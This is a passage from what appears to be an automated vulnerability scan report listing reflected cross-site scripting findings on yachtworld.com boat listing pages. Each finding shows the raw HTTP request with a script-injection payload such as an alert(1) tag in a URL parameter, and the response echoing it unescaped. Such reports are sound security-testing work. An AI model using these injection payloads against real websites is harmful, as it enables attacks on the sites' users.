2-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:31 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b&boat_id=2141315">
...[SNIP]...

3.108. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6337a"><script>alert(1)</script>1388dae81f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States?6337a"><script>alert(1)</script>1388dae81f8=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?6337a"><script>alert(1)</script>1388dae81f8=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States&boat_id=2141315">
...[SNIP]...

3.109. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4f9"><script>alert(1)</script>91ca0df6288 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States&boat_id=2255088">
...[SNIP]...

3.110. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb59c"><script>alert(1)</script>7529dd0e55 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F128